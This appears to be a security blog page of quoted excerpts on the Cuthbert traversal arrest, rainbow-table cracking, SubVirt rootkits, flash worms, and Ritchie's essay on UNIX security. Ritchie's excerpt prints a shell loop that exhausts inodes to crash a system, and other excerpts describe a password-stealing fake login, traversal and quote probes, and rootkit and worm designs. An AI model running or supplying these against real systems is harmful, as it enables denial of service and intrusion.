security

Arrested for directory truncation

From Sol Terra’s [IP] Use the Dots, Go to Jail – that’s the law (Interesting People: 24 October 2005):

Today, Daniel Cuthbert was found guilty.

Daniel Cuthbert saw the devastating images of the Tsunami disaster and decided to donate £30 via the website that was hastily set up to be able to process payments. He is a computer security consultant, regarded in his field as an expert and respected by colleagues and employers alike. He entered his full personal details (home address, number, name and full card details). He did not receive confirmation of payment or a reference and became concerned as he has had issues with fraud on his card on a previous occasion. He then did a couple of very basic penetration tests. If they resulted in the site being insecure as he suspected, he would have contacted the authorities, as he had nothing to gain from doing this for fun and keeping the fact to himself that he suspected the site to be a phishing site and all this money pledged was going to some South American somewhere in South America.

The first test he used was the (dot dot slash, 3 times) ../../../ sequence. The ../ command is called a Directory Traversal which allows you to move up the hierarchy of a file. The triple sequence amounts to a DTA (Directory Traversal Attack), allows you to move three times. It is not a complete attack as that would require a further command, it was merely a light =knock on the door˜. The other test, which constituted an apostrophe( ‘ ) was also used. He was then satisfied that the site was safe as his received no error messages in response to his query, then went about his work duties. There were no warnings or dialogue boxes showing that he had accessed an unauthorised area.

20 days later he was arrested at his place of work and had his house searched. In the first part of his interview, he did not readily acknowledge his actions, but in the second half of the interview, he did. He was a little distraught and confused upon arrest, as anyone would be in that situation and did not ask for a solicitor, as he maintained he did nothing wrong. His tests were done in a 2 minute timeframe, then forgotten about.

Arrested for directory truncation Read More »

Rainbow cracking is now a public service

From Robert Lemos’s Rainbow warriors crack password hashes (The Register: 10 November 2005):

Over the past two years, three security enthusiasts from the United States and Europe set a host of computers to the task of creating eleven enormous tables of data that can be used to look up common passwords. The tables – totaling 500GB – form the core data of a technique known as rainbow cracking, which uses vast dictionaries of data to let anyone reverse the process of creating hashes – the statistically unique codes that, among other duties, are used to obfuscate a user’s password. Last week, the trio went public with their service. Called RainbowCrack Online, the site allows anyone to pay a subscription fee and submit password hashes for cracking.

“Usually people think that a complex, but short, password is very secure, something like $FT%_3^,” said Travis, one of the founders of RainbowCrack Online, who asked that his last name not be used. “However, you will find that our tables handle that password quite easily.”

Rainbow cracking is now a public service Read More »

Banks have more to fear from internal attacks than external

From electricnews.net’s Internal security attacks affecting banks (The Register: 23 June 2005):

Internal security breaches at the world’s banks are growing faster than external attacks, as institutions invest in technology, instead of employee training.

According to the 2005 Global Security Survey, published by Deloitte Touche Tohmatsu, 35 per cent of respondents said that they had encountered attacks from inside their organisation within the last 12 months, up from 14 per cent in 2004. In contrast, only 26 per cent confirmed external attacks, compared to 23 per cent in 2004. Click Here

The report, which surveyed senior security officers from the world’s top 100 financial institutions, found that incidences of phishing and pharming, two online scams which exploit human behaviour, are growing rapidly.

Banks have more to fear from internal attacks than external Read More »

Virtual-machine based rootkits

From Samuel T. King, Peter M. Chen, Yi-Min Wang, Chad Verbowski, Helen J. Wang, & Jacob R. Lorch’s “SubVirt: Implementing malware with virtual machines
” [PDF] (: ):

We evaluate a new type of malicious software that gains qualitatively more control over a system. This new type of malware, which we call a virtual-machine based rootkit (VMBR), installs a virtual-machine monitor underneath an existing operating system and hoists the original operating system into a virtual machine. Virtual-machine based rootkits are hard to detect and remove because their state cannot be accessed by software running in the target system. Further, VMBRs support general-purpose malicious services by allowing such services to run in a separate operating system that is protected from the target system. We evaluate this new threat by implementing two proof-of-concept VMBRs. We use our proof-of-concept VMBRs to subvert Windows XP and Linux target systems, and we implement four example malicious services using the VMBR platform. Last, we use what we learn from our proof-of-concept VMBRs to explore ways to defend against this new threat. We discuss possible ways to detect and prevent VMBRs, and we implement a defense strategy suitable for protecting systems against this threat. …

A major goal of malware writers is control, by which we mean the ability of an attacker to monitor, intercept, and modify the state and actions of other software on the system. Controlling the system allows malware to remain invisible by lying to or disabling intrusion detection software.

Control of a system is determined by which side occupies the lower layer in the system. Lower layers can control upper layers because lower layers implement the abstractions upon which upper layers depend. For example, an operating system has complete control over an application’s view of memory because the operating system mediates access to physical memory through the abstraction of per-process address spaces. Thus, the side that controls the lower layer in the system has a fundamental advantage in the arms race between attackers and defenders. If the defender’s security service occupies a lower layer than the malware, then that security service should be able to detect, contain, and remove the malware. Conversely, if the malware occupies a lower layer than the security service, then the malware should be able to evade the security service and manipulate its execution.

Because of the greater control afforded by lower layers in the system, both security services and rootkits have evolved by migrating to these layers. Early rootkits simply replaced user-level programs, such as ps, with trojan horse programs that lied about which processes were running. These user-level rootkits were detected easily by user-level intrusion detection systems such as TripWire [29], and so rootkits moved into the operating system kernel. Kernel-level rootkits such as FU [16] hide malicious processes by modifying kernel data structures [12]. In response, intrusion detectors also moved to the kernel to check the integrity of the kernel’s data structures [11, 38]. Recently, researchers have sought to hide the memory footprint of malware from kernel-level detectors by modifying page protections and intercepting page faults [43]. To combat such techniques, future detectors may reset page protections and examine the code of the page-fault handler. …

Our project, which is called SubVirt, shows how attackers can use virtual-machine technology to address the limitations of current malware and rootkits. We show how attackers can install a virtual-machine monitor (VMM) underneath an existing operating system and use that VMM to host arbitrary malicious software. The resulting malware, which we call a virtual- machine based rootkit (VMBR), exercises qualitatively more control than current malware, supports general-purpose functionality, yet can completely hide all its state and activity from intrusion detection systems running in the target operating system and applications. …

A virtual-machine monitor is a powerful platform for malware. A VMBR moves the targeted system into a virtual machine then runs malware in the VMM or in a second virtual machine. The targeted system sees little to no difference in its memory space, disk space, or execution (depending on how completely the machine is virtualized). The VMM also isolates the malware’s state and events completely from those of the target system, so software in the target system cannot see or modify the malicious software. At the same time, the VMM can see all state and events in the target system, such as keystrokes, network packets, disk state, and memory state. A VMBR can observe and modify these states and events—without its own actions being observed—because it completely controls the virtual hardware presented to the operating system and applications. Finally, a VMBR provides a convenient platform for developing malicious services. A malicious service can benefit from all the conveniences of running in a separate, general-purpose operating system while remaining invisible to all intrusion detection software running in the targeted system. In addition, a malicious service can use virtual-machine introspection to understand the events and states taking place in the targeted system. …

In the overall structure of a VMBR, a VMBR runs beneath the existing (target) operating system and its applications (Figure 2). To accomplish this, a VMBR must insert itself beneath the target operating system and run the target OS as a guest. To insert itself beneath an existing system, a VMBR must manipulate the system boot sequence to ensure that the VMBR loads before the target operating system and applications. After the VMBR loads, it boots the target OS using the VMM. As a result, the target OS runs normally, but the VMBR sits silently beneath it.

To install a VMBR on a computer, an attacker must first gain access to the system with sufficient privileges to modify the system boot sequence. There are numerous ways an attacker can attain this privilege level. For example, an attacker could exploit a remote vulnerability, fool a user into installing malicious software, bribe an OEM or vendor, or corrupt a bootable CD-ROM or DVD image present on a peer-to-peer network. On many systems, an attacker who attains root or Administrator privileges can manipulate the system boot sequence. On other systems, an attacker must execute code in kernel mode to manipulate the boot sequence. We assume the attacker can run arbitrary code on the target system with root or Administrator privileges and can install kernel modules if needed. …

VMBRs use a separate attack OS to deploy malware that is invisible from the perspective of the target OS but is still easy to implement. None of the states or events of the attack OS are visible from within the target OS, so any code running within an attack OS is effectively invisible. The ability to run invisible malicious services in an attack OS gives intruders the freedom to use user-mode code with less fear of detection.

We classify malicious services into three categories: those that need not interact with the target system at all, those that observe information about the target system, and those that intentionally perturb the execution of the target system. In the remainder of this section, we discuss how VMBRs support each class of service.

The first class of malicious service does not communicate with the target system. Examples of such services are spam relays, distributed denial-of-service zombies, and phishing web servers. A VMBR supports these services by allowing them to run in the attack OS. This provides the convenience of user-mode execution without exposing the malicious service to the target OS.

The second class of malicious service observes data or events from the target system. VMBRs enable stealthy logging of hardware-level data (e.g., keystrokes, network packets) by modifying the VMM’s device emulation software. This modification does not affect the virtual devices presented to the target OS. For example, a VMBR can log all network packets by modifying the VMM’s emulated network card. These modifications are invisible to the target OS because the interface to the network card does not change, but the VMBR can still record all network packets. …

The third class of malicious service deliberately modifies the execution of the target system. For example, a malicious service could modify network communication, delete e-mail messages, or change the execution of a target application. A VMBR can customize the VMM’s device emulation layer to modify hardware-level data. A VMBR can also modify data or execution within the target through virtual-machine introspection.

Using our proof-of-concept VMBRs, we developed four malicious services that represent a range of services a writer of malicious software may want to deploy. We implemented a phishing web server, a keystroke logger, a service that scans the target file system looking for sensitive files, and a defense countermeasure that defeats a current virtual-machine detector. …

To avoid being removed, a VMBR must protect its state by maintaining control of the system. As long as the VMBR controls the system, it can thwart any attempt by the target to modify the VMBR’s state. The VMBR’s state is protected because the target system has access only to the virtual disk, not the physical disk.

The only time the VMBR loses control of the system is in the period of time after the system powers up until the VMBR starts. Any code that runs in this period can access the VMBR’s state directly. The first code that runs in this period is the system BIOS. The system BIOS initializes devices and chooses which medium to boot from. In a typical scenario, the BIOS will boot the VMBR, after which the VMBR regains control of the system. However, if the BIOS boots a program on an alternative medium, that program can access the VMBR’s state.

Because VMBRs lose control when the system is powered off, they may try to minimize the number of times full system power-off occurs. The events that typically cause power cycles are reboots and shutdowns. VMBRs handle reboots by restarting the virtual hardware rather than resetting the underlying physical hardware. By restarting the virtual hardware, VMBRs provide the illusion of resetting the underlying physical hardware without relinquishing control. Any alternative bootable medium used after a target reboot will run under the control of the VMBR.

In addition to handling target reboots, VMBRs can also emulate system shutdowns such that the system appears to shutdown, but the VMBR remains running on the system. We use ACPI sleep states [3] to emulate system shutdowns and to avoid system power-downs. ACPI sleep states are used to switch hardware into a low-power mode. This low-power mode includes spinning down hard disks, turning off fans, and placing the monitor into a power-saving mode. All of these actions make the computer appear to be powered off. Power is still applied to RAM, so the system can come out of ACPI sleep quickly with all memory state intact. When the user presses the power button to “power-up” the system, the computer comes out of the low-power sleep state and resumes the software that initiated the sleep. Our VMBR leverage this low-power mode to make the system appear to be shutdown; when the user “powers-up” the system by pressing the power button the VMBR resumes. If the user attempts to boot from an alternative medium at this point, it will run under the control of the VMBR. We implemented shutdown emulation for our VMware-based VMBR. …

We first measure the disk space required to install the VMBR. Our Virtual PC-based VMBR image is 106 MB compressed and occupies 251 MB of disk space when uncompressed. Our VMware-based VMBR image is 95 MB compressed and occupies 228 MB of disk space uncompressed. The compressed VMBR images take about 4 minutes to download on a 3 Mb/s cable modem connection and occupy only a small fraction of the total disk space present on modern systems. …

The installation measurements include the time it takes to uncompress the attack image, allocate disk blocks, store the attack files, and modify the system boot sequence. Installation time for the VMware-based VMBR is 24 seconds. Installation for the Virtual PC-based VMBR takes longer (262 seconds) because the hardware used for this test is much slower and has less memory. In addition, when installing a VMBR underneath Windows XP, we swap the contents of the disk blocks used to store the VMBR with those in the beginning of the Windows XP disk partition, and these extra disk reads/writes further lengthen the installation time.

We next measure boot time, which we define as the amount of time it takes for an OS to boot and reach an initial login prompt. Booting a target Linux system without a VMBR takes 53 seconds. After installing the VMware-based VMBR, booting the target system takes 74 seconds after a virtual reboot and 96 seconds after a virtual shutdown. It takes longer after a virtual shutdown than after a virtual reboot because the VMM must re-initialize the physical hardware after coming out of ACPI sleep. In the uncommon case that power is removed from the physical system, the host OS and VMM must boot before loading the target Linux OS. The VMware-based VMBR takes 52 seconds to boot the host OS and load the VMM and another 93 seconds to boot the target Linux OS. We speculate that it takes longer to boot the target OS after full system power-down than after a virtual reboot because some performance optimizations within the VMware VMM take time to warm up.

Booting a target Windows XP system without a VMBR takes 23 seconds. After installing the Virtual PC-based VMBR, booting the target system takes 54 seconds after a virtual reboot. If power is removed from the physical system, the Virtual PC-based VMBR takes 45 seconds to boot the host OS and load the VMM and another 56 seconds to boot the target Windows XP OS. …

Despite using specialized guest drivers, our current proof-of-concept VMBRs use virtualized video cards which may not export the same functionality as the underlying physical video card. Thus, some high-end video applications, like 3D games or video editing applications, may experience degraded performance.

The physical memory allocated to the VMM and attack OS is a small percentage of the total memory on the system (roughly 3%) and thus has little performance impact on a target OS running above the VMBR. …

In this section, we explore techniques that can be used to detect the presence of a VMBR. VMBRs are fundamentally more difficult to detect than traditional malware because they virtualize the state seen by the target system and because an ideal VMBR modifies no state inside the target system. Nonetheless, a VMBR does leave signs of its presence that a determined intrusion detection system can observe. We classify the techniques that be used to detect a VMBR by whether the detection system is running below the VMBR, or whether the detection system is running above the VMBR (i.e., within the target system). …

There are various ways to gain control below the VMBR. One way to gain control below the VMBR is to use secure hardware. Intel’s LaGrande [25], AMD’s platform for trustworthy computing [2], and Copilot [36] all propose hardware that can be used to develop and deploy low-layer security software that would run beneath a VMBR.

Another way to gain control below the VMBR is to boot from a safe medium such as a CD-ROM, USB drive or network boot server. This boot code can run on the system before the VMBR loads and can view the VMBR’s quiescent disk state. …

A third way to gain control below the VMBR is to use a secure VMM [17]. Like alternative bootable media, secure VMMs gain control of the system before the operating system boots. Running a secure VMM does not by itself stop a VMBR, as a VMBR can still insert itself between the VMM and the operating system. However, a secure VMM does retain control over the system as it runs and could easily add a check to stop a VMBR from modifying the boot sequence above the secure VMM. …

There are several reasons why traditional techniques (e.g., having the target system scan memory or disk) may not be able to detect a VMBR. First, the target system is confined to its virtual machine. Since the VMBR stores its state outside that virtual machine, the target system will see no suspicious changes in its own state. Second, even if the target system did see something amiss, the VMBR could tamper with the execution of the detector and force it to report incorrect results. …

A fundamental perturbation of the VMBR is that it uses machine resources such as CPU time, memory and disk space, and possibly network bandwidth. A VMBR adds CPU overhead to trap and emulate privileged instructions, as well as to run any malicious services. …

In addition to CPU overhead, a VMBR uses memory and disk space. A detector can detect this overhead by running a program that requires the entire machine’s memory or disk space. A VMBR can hide its space overhead in several ways. It can hide its memory overhead by mapping target pages with the same contents to the same physical page [47] or by paging some data to disk. While this extra paging activity may increase the running time of the program, the memory overhead of VMware was too small to measure in our tests. A VMBR can hide its disk overhead by compressing a portion of the disk, sharing disk blocks with the same contents, or pretending that the disk space it uses have bad sectors. …

Another type of perturbation is caused by the variety of I/O devices on the computer. Recall that a VMM typically virtualizes all I/O devices. However, virtualizing the I/O device without changing the target’s view of the device requires one to understand the interface and semantics of each device. This is a formidable task, given the wide variety of I/O devices present on today’s computing platforms. Instead, current VMMs emulate a small number of virtual devices (often with customized interfaces to improve performance [1, 34]). The target OS must then use the drivers for the emulated virtual devices. …

A final source of perturbations are caused by the imperfect virtualization of today’s x86 processors. Sensitive, non-privileged instructions like sidt leak information about the VMM yet do not trap to the VMM [31, 37]. …

We expect future enhancements to the x86 platform to reduce these perturbations. Upcoming virtualization support from Intel [45] and AMD [7] will enable more efficient virtualization. These enhancements eliminate sensitive, non-privileged instructions so they cannot be used from the CPU’s user-mode to detect the presence of a VMM. These enhancements may also accelerate transitions to and from the VMM, and this may reduce the need to run specialized guest drivers. …

However, VMBRs have a number of disadvantages compared to traditional forms of malware. When compared to traditional forms of malware, VMBRs tend to have more state, be more difficult to install, require a reboot before they can run, and have more of an impact on the overall system. Although VMBRs do offer greater control over the compromised system, the cost of this higher level of control may not be justified for all malicious applications.

Virtual-machine based rootkits Read More »

The inventor of UNIX on its security … or lack thereof

From Dennis M. Ritchie’s “On the Security of UNIX” (: ):

The first fact to face is that UNIX was not developed with security, in any realistic sense, in mind; this fact alone guarantees a vast number of holes. (Actually the same statement can be made with respect to most systems.) The area of security in which UNIX is theoretically weakest is in protecting against crashing or at least crippling the operation of the system. The problem here is not mainly in uncritical acceptance of bad parameters to system calls – there may be bugs in this area, but none are known – but rather in lack of checks for excessive consumption of resources. Most notably, there is no limit on the amount of disk storage used, either in total space allocated or in the number of files or directories. Here is a particularly ghastly shell sequence guaranteed to stop the system:

while : ; do
mkdir x
cd x
done

Either a panic will occur because all the i-nodes on the device are used up, or all the disk blocks will be consumed, thus preventing anyone from writing files on the device. …

The picture is considerably brighter in the area of protection of information from unauthorized perusal and destruction. Here the degree of security seems (almost) adequate theoretically, and the problems lie more in the necessity for care in the actual use of the system. …

It must be recognized that the mere notion of a super-user is a theoretical, and usually practical, blemish on any protection scheme. …

On the issue of password security, UNIX is probably better than most systems. Passwords are stored in an encrypted form which, in the absence of serious attention from specialists in the field, appears reasonably secure, provided its limitations are understood. … We have observed that users choose passwords that are easy to guess: they are short, or from a limited alphabet, or in a dictionary. Passwords should be at least six characters long and randomly chosen from an alphabet which includes digits and special characters.

Of course there also exist feasible non-cryptanalytic ways of finding out passwords. For example: write a program which types out login: on the typewriter and copies whatever is typed to a file of your own. Then invoke the command and go away until the victim arrives. …

The fact that users can mount their own disks and tapes as file systems can be another way of gaining super-user status. Once a disk pack is mounted, the system believes what is on it. Thus one can take a blank disk pack, put on it anything desired, and mount it. There are obvious and unfortunate consequences. For example: a mounted disk with garbage on it will crash the system; one of the files on the mounted disk can easily be a password-free version of su; other files can be unprotected entries for special files. The only easy fix for this problem is to forbid the use of mount to unprivileged users. A partial solution, not so restrictive, would be to have the mount command examine the special file for bad data, set-UID programs owned by others, and accessible special files, and balk at unprivileged invokers.

The inventor of UNIX on its security … or lack thereof Read More »

The math behind Flash Worms

From Stuart Staniford, David Moore, Vern Paxson, & Nicholas Weaver’s “The Top Speed of Flash Worms” [PDF] (29 October 2004):

Flash worms follow a precomputed spread tree using prior knowledge of all systems vulnerable to the worm’s exploit. In previous work we suggested that a flash worm could saturate one million vulnerable hosts on the Internet in under 30 seconds [18]. We grossly over-estimated.

In this paper, we revisit the problem in the context of single packet UDP worms (inspired by Slammer and Witty). Simulating a flash version of Slammer, calibrated by current Internet latency measurements and observed worm packet delivery rates, we show that a worm could saturate 95% of one million vulnerable hosts on the Internet in 510 milliseconds. A similar worm using a TCP based service could 95% saturate in 1.3 seconds. …

Since Code Red in July 2001 [11], worms have been of great interest in the security research community. This is because worms can spread so fast that existing signature-based anti-virus and intrusion-prevention defenses risk being irrelevant; signatures cannot be manually generated fast enough …

The premise of a flash worm is that a worm releaser has somehow acquired a list of vulnerable addresses, perhaps by stealthy scanning of the target address space or perhaps by obtaining a database of parties to the vulnerable protocol. The worm releaser, in advance, computes an efficient spread tree and encodes it in the worm. This allows the worm to be far more efficient than a scan- ning worm; it does not make large numbers of wild guesses for every successful infection. Instead, it successfully infects on most attempts. This makes it less vulnerable to containment defenses based on looking for missed connections [7, 16, 24], or too many connections [20, 25]. …

A difficulty for the flash worm releaser is a lack of robustness if the list of vulnerable addresses is imperfect. Since it is assembled in advance, and networks constantly change, the list is likely to be more-or-less out of date by the time of use. This has two effects. Firstly, a certain proportion of actually vulnerable and reachable machines may not be on the list, thus preventing the worm from saturating as fully as otherwise possible. More seriously, some ad- dresses on the list may not be vulnerable. If such nodes are near the base of the spread tree, they may prevent large numbers of vulnerable machines from being infected by the worm. Very deep spread trees are particularly prone to this. Thus in thinking about flash worms, we need to explore the issue of robustness as well as speed. …

The Slammer worm [10, 22] of January 2003 was the fastest scanning worm to date by far and is likely close to the lower bound on the size of a worm. Data on observed Slammer infections (and on those of the similar Witty worm) provide us with estimates for packet rate and minimum code size in future flash worms. Slammer infected Microsoft’s SQL server. A single UDP packet served as exploit and worm and required no acknowledgment. The size of the data was 376 bytes, giving a 404 byte IP packet. This consisted of the following sections:

• IP header
• UDP header
• Data to overflow buffer and gain control
• Code to find the addresses of needed functions.
• Code to initialize a UDP socket
• Code to seed the pseudo-random number generator
• Code to generate a random address
• Code to copy the worm to the address via the socket …

In this paper, we assume that the target vulnerable population is N = 1000000 (one million hosts-somewhat larger than the 360, 000 infected by Code Red [11]). Thus in much less than a sec- ond, the initial host can directly infect a first generation of roughly 5,000 – 50,000 intermediate nodes, leaving each of those with only 20-200 hosts to infect to saturate the population. There would be no need for a third layer in the tree.

This implies that the address list for the intermediate hosts can fit in the same packet as the worm; 200 addresses only consumes 800 bytes. A flash version of Slammer need only be slightly different than the original: the address list of nodes to be infected would be carried immediately after the end of the code, and the final loop could traverse that list sending out packets to infect it (instead of generating pseudo-random addresses). …

The graph indicates clearly that such flash worms can indeed be extraordinarily fast-infecting 95% of hosts in 510ms, and 99% in 1.2s. There is a long tail at the end due to the long tail in Internet latency data; some parts of the Internet are poorly connected and take a few seconds to reach. …

Can these results be extended to TCP services? If so, then our results are more grave; TCP offers worm writers a wealth of additional services to exploit. In this section we explore these issues. We conclude that top-speed propagation is viable for TCP worms, too, at the cost of an extra round-trip in latency to establish the connection and double the bandwidth if we want to quickly recover from loss. …

We believe a TCP worm could be written to be not much larger than Slammer. In addition to that 404 bytes, it needs a few more ioctl calls to set up a low level socket to send crafted SYN packets, and to set up a separate thread to listen for SYN-ACKs and send out copies of the worm. We estimate 600 bytes total. Such a worm could send out SYNs at line rate, confident that the SYN-ACKs would come back slower due to latency spread. The initial node can maintain a big enough buffer for the SYN-ACKs and the secondary nodes only send out a small number of SYNs. Both will likely be limited by the latency of the SYN-ACKs returning rather than the small amount of time required to deliver all the worms at their respective line rates.

To estimate the performance of such a small TCP flash worm, we repeated the Monte Carlo simulation we performed for the UDP worm with the latency increased by a factor of three for the hand- shake and the outbound delivery rates adjusted for 40 byte SYN packets. The results are shown in Figure 6. This simulation predicts 95% compromise after 1.3s, and 99% compromise after 3.3s. Thus TCP flash worms are a little slower than UDP ones because of the handshake latency, but can still be very fast. …

It appears that the optimum solution for the attacker – considering the plausible near-term worm defenses – is for a flash worm author to simply ignore the defenses and concentrate on making the worm as fast and reliable as possible, rather than slowing the worm to avoid detection. Any system behind a fully working defense can simply be considered as resistant, which the worm author counters by using the resiliency mechanisms outlined in the previous sections, combined with optimizing for minimum infection time.

Thus, for the defender, the current best hope is to keep the list of vulnerable addresses out of the hands of the attacker. …

The fastest worm seen in the wild so far was Slammer [10]. That was a random scanning worm, but saturated over 90% of vulnerable machines in under 10 minutes, and appears to have mainly been limited by bandwidth. The early exponential spread had an 8.5s time constant.

In this paper, we performed detailed analysis of how long a flash worm might take to spread on the contemporary Internet. These analyses use simulations based on actual data about Internet latencies and observed packet delivery rates by worms. Flash worms can complete their spread extremly quickly – with most infections occuring in much less than a second for single packet UDP worms and only a few seconds for small TCP worms. Anyone designing worm defenses needs to bear these time factors in mind.

The math behind Flash Worms Read More »

An overview of Flash Worms

From Stuart Staniford, Gary Grim, & Roelof Jonkman’s “Flash Worms: Thirty Seconds to Infect the Internet” (Silicon Defense: 16 August 2001):

In a recent very ingenious analysis, Nick Weaver at UC Berkeley proposed the possibility of a Warhol Worm that could spread across the Internet and infect all vulnerable servers in less than 15 minutes (much faster than the hours or days seen in Worm infections to date, such as Code Red).

In this note, we observe that there is a variant of the Warhol strategy that could plausibly be used and that could result in all vulnerable servers on the Internet being infected in less than thirty seconds (possibly significantly less). We refer to this as a Flash Worm, or flash infection. …

For the well funded three-letter agency with an OC12 connection to the Internet, we believe a scan of the entire Internet address space can be conducted in a little less than two hours (we estimate about 750,000 syn packets per second can be fit down the 622Mbps of an OC12, allowing for ATM/AAL framing of the 40 byte TCP segments. The return traffic will be smaller in size than the outbound. Faster links could scan even faster. …

Given that an attacker has the determination and foresight to assemble a list of all or most Internet connected addresses with the relevant service open, a worm can spread most efficiently by simply attacking addresses on that list. There are about 12 million web servers on the Internet (according to Netcraft), so the size of that particular address list would be 48MB, uncompressed. …

In conclusion, we argue that a small worm that begins with a list including all likely vulnerable addresses, and that has initial knowledge of some vulnerable sites with high-bandwidth links, can infect almost all vulnerable servers on the Internet in less than thirty seconds.

An overview of Flash Worms Read More »

Prices for zombies in the Underground

From Byron Acohido and Jon Swartz’s “Going price for network of zombie PCs: $2,000-$3,000” (USA TODAY: 8 September 2004):

In the calculus of Internet crime, two of the most sought-after commodities are zombie PCs and valid e-mail addresses.

One indication of the going rate for zombie PCs comes from a June 11 posting on SpecialHam.com, an electronic forum for spammers. The asking price for use of a network of 20,000 zombie PCs: $2,000 to $3,000. …

To put a zombie network to work, an attacker needs a list of targets in the form of e-mail addresses. Lists can be purchased from specialists who “harvest” anything that looks like an e-mail address from Web sites, news groups, chat rooms and subscriber lists. Compiled on CDs, such lists cost as little as $5 per million e-mail addresses. But you get what you pay for: Many CD entries tend to be either obsolete or “spam traps” — addresses seeded across the Internet by spam-filtering companies to identify, and block, spammers.

Valid e-mail addresses command a steep price. In June, authorities arrested a 24-year-old America Online engineer, Jason Smathers, and charged him with stealing 92 million AOL customer screen names and selling them to a spammer for $100,000.

Prices for zombies in the Underground Read More »

Ballmer says Windows is more secure than Linux

From Steven J. Vaughan-Nichols’s “Longhorn ‘Wave’ Rolling In” (eWeek: 20 October 2004):

The questions led into a discussion of Linux, with Bittmann observing that there’s a market perception that Linux is more secure.

“It’s just not true,” Ballmer responded. “We’re more secure than the other guys. There are more vulnerabilities in Linux; it takes longer for Linux developers to fix security problems. It’s a good decision to go with Windows.”

Ballmer says Windows is more secure than Linux Read More »

Steve Ballmer couldn’t fix an infected Windows PC

From David Frith’s “Microsoft takes on net nasties” (Australian IT: 6 June 2006):

MICROSOFT executives love telling stories against each other. Here’s one that platforms vice-president Jim Allchin told at a recent Windows Vista reviewers conference about chief executive Steve Ballmer.

It seems Steve was at a friend’s wedding reception when the bride’s father complained that his PC had slowed to a crawl and would Steve mind taking a look.

Allchin says Ballmer, the world’s 13th wealthiest man with a fortune of about $18 billion, spent almost two days trying to rid the PC of worms, viruses, spyware, malware and severe fragmentation without success.

He lumped the thing back to Microsoft’s headquarters and turned it over to a team of top engineers, who spent several days on the machine, finding it infected with more than 100 pieces of malware, some of which were nearly impossible to eradicate.

Among the problems was a program that automatically disabled any antivirus software.

“This really opened our eyes to what goes on in the real world,” Allchin told the audience.

If the man at the top and a team of Microsoft’s best engineers faced defeat, what chance do ordinary punters have of keeping their Windows PCs virus-free?

Steve Ballmer couldn’t fix an infected Windows PC Read More »

Search for “high score” told them who stole the PC

From Robert Alberti’s “more on Supposedly Destroyed Hard Drive Purchased In Chicago” (Interesting People mailing list: 3 June 2006):

It would be interesting to analyze that drive to see if anyone else was using it during the period between when it went to Best Buy, and when it turned up at the garage sale. We once discovered who stole, and then returned, a Macintosh from a department at the University of Minnesota with its drive erased. We did a hex search of the drive surface for the words “high score”. There was the name of the thief, one of the janitors, who confessed when presented with evidence.

Search for “high score” told them who stole the PC Read More »

Google’s data trove tempts the bad guys

From “Fuzzy maths” (The Economist: 11 May 2006):

Slowly, the company is realising that it is so important that it may not be able to control the ramifications of its own actions. “As more and more data builds up in the company’s disk farms,” says Edward Felten, an expert on computer privacy at Princeton University, “the temptation to be evil only increases. Even if the company itself stays non-evil, its data trove will be a massive temptation for others to do evil.”

Google’s data trove tempts the bad guys Read More »

Court acceptance of forensic & biometric evidence

From Brendan I. Koerner’s “Under the Microscope” (Legal Affairs: July/August 2002):

The mantra of forensic evidence examination is “ACE-V.” The acronym stands for Analysis, Comparison, Evaluation, and Verification, which forensic scientists compare with the step-by-step method drilled into countless chemistry students. “Instead of hypothesis, data collection, conclusion, we have ACE-V,” says Elaine Pagliaro, an expert at the Connecticut lab who specializes in biochemical analysis. “It’s essentially the same process. It’s just that it grew out of people who didn’t come from a background in the scientific method.” …

Yet for most of the 20th century, courts seldom set limits on what experts could say to juries. The 1923 case Frye v. United States mandated that expert witnesses could discuss any technique that had “gained general acceptance in the particular field in which it belongs.” Courts treated forensic science as if it were as well-founded as biology or physics. …

In 1993, the Supreme Court set a new standard for evidence that took into account the accelerated pace of scientific progress. In a case called Daubert v. Merrell Dow Pharmaceuticals, the plaintiffs wanted to show the jury some novel epidemiological studies to bolster their claim that Merrell Dow’s anti-nausea drug Bendectin caused birth defects. The trial judge didn’t let them. The plaintiff’s evidence, he reasoned, was simply too futuristic to have gained general acceptance.

When the case got to the Supreme Court, the justices seized the opportunity to revolutionize the judiciary’s role in supervising expert testimony. Writing for a unanimous court, Justice Harry Blackmun instructed judges to “ensure that any and all scientific testimony or evidence admitted is not only relevant, but reliable.” Daubert turned judges into “gatekeepers” responsible for discerning good science from junk before an expert takes the stand. Blackmun suggested that good science must be testable, subject to peer review, and feature a “known or potential rate of error.” …

There are a few exceptions, though. In 1999, Judge Nancy Gertner of the Federal District Court in Massachusetts set limits on the kinds of conclusions a handwriting expert could draw before a jury in United States v. Hines. The expert could point out similarities between the defendant’s handwriting and the writing on a stick-up note, the judge said, but she could not “make any ultimate conclusions on the actual authorship.” The judge questioned “the validity of the field” of handwriting analysis, noting that “one’s handwriting is not at all unique in the sense that it remains the same over time, or unique[ly] separates one individual from another.”

Early this year, Judge Pollak stunned the legal world by similarly reining in fingerprint experts in the murder-for-hire case United States v. Plaza. Pollak was disturbed by a proficiency test finding that 26 percent of the crime labs surveyed in different states did not correctly identify a set of latent prints on the first try. “Even 100 years of ‘adversarial’ testing in court cannot substitute for scientific testing,” he said. He ruled that the experts could show the jury similarities between the defendants’ prints and latent prints found at the crime scenes, but could not say the prints matched. …

… the University of West Virginia recently offered the nation’s first-ever four-year degree in biometrics …

Court acceptance of forensic & biometric evidence Read More »

5 reasons people exaggerate risk

From Bruce Schneier’s “Movie Plot Threat Contest: Status Report“:

In my book, Beyond Fear, I discusse five different tendencies people have to exaggerate risks: to believe that something is more risky than it actually is.

1. People exaggerate spectacular but rare risks and downplay common risks.
2. People have trouble estimating risks for anything not exactly like their normal situation.
3. Personified risks are perceived to be greater than anonymous risks.
4. People underestimate risks they willingly take and overestimate risks in situations they can’t control.
5. People overestimate risks that are being talked about and remain an object of public scrutiny.

5 reasons people exaggerate risk Read More »

Matching identities across databases, anonymously

From MIT Technology Review‘s’ “Blindfolding Big Brother, Sort of“:

In 1983, entrepreneur Jeff Jonas founded Systems Research and Development (SRD), a firm that provided software to identify people and determine who was in their circle of friends. In the early 1990s, the company moved to Las Vegas, where it worked on security software for casinos. Then, in January 2005, IBM acquired SRD and Jonas became chief scientist in the company’s Entity Analytic Solutions group.

His newest technology, which allows entities such as government agencies to match an individual found in one database to that same person in another database, is getting a lot of attention from governments, banks, health-care providers, and, of course, privacy advocates. Jonas claims that his technology is as good at protecting privacy as it as at finding important information. …

JJ: The technique that we have created allows the bank to anonymize its customer data. When I say “anonymize,” I mean it changes the name and address and date of birth, or whatever data they have about an identity, into a numeric value that is nonhuman readable and nonreversible. You can’t run the math backwards and compute from the anonymized value what the original input value was. …

